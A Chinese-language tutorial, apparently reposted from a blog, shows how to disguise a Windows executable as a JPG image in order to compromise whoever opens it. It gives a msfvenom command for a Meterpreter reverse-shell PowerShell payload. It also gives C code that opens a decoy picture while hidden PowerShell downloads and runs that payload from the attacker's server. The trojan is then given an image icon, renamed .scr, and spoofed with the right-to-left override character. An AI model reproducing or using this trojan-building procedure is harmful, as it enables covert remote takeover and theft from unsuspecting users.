【奇淫技巧】圖片偽裝大法--偽裝可執行文


能夠將可執行文件偽裝成圖片

用到的工具: kali 2.0、msfasploit、Resource Hacker

 

首先利用msfvenom生成一個powershell的ps1文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.149.129 lport=2234 -f psh-reflection>/var/www/html/payload.ps1

 

隨后開啟apache服務

service apache2 start

 

然后找兩張png和ico一模一樣的圖片

一樣放到apache目錄下

接下來在windows系統上編譯如下代碼

#include <stdio.h>
#include <windows.h>
int main()
{
system("powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://192.168.149.129/shot.png', 'C:\\Users\\Public\\shot.png') & start C:\\Users\\Public\\shot.png & powershell.exe -windowstyle hidden -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.149.129/payload.ps1');test.ps1\"");
return 0;
}

 

這串代碼會遠程下載shot.png,並保持在本地。然后馬上打開它!!

這時候,把編譯好的惡意程序的圖標改成shot.png一樣的圖片就可以偽裝成一張圖了。這時候你打開不僅僅會打開本地下載好的圖片,而且還會執行我們的payload.ps1

 

下面就說如何更改圖標

下載一個Resource Hacker

open一個可執行文件--》Add Binary--》添加完圖標后保存

然后就在桌面上出現一個demon.exe

這時候還沒完,我們把他改成“gpj.scr”格式

不用擔心改成scr格式文件就無法運行了

接下來我們利用系統專有的從右至左 (Right-to-Left) 的字符重寫  (RLO)控制字符來達到迷惑的效果

 先改成gpj.scr  然后吧光標放在gpj的前面,再右鍵改字符

 

我們來試試效果:

配置好msf反彈

可以看到,運行rcs.jpg之后,直接打開了圖片並且msf彈回了shell。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM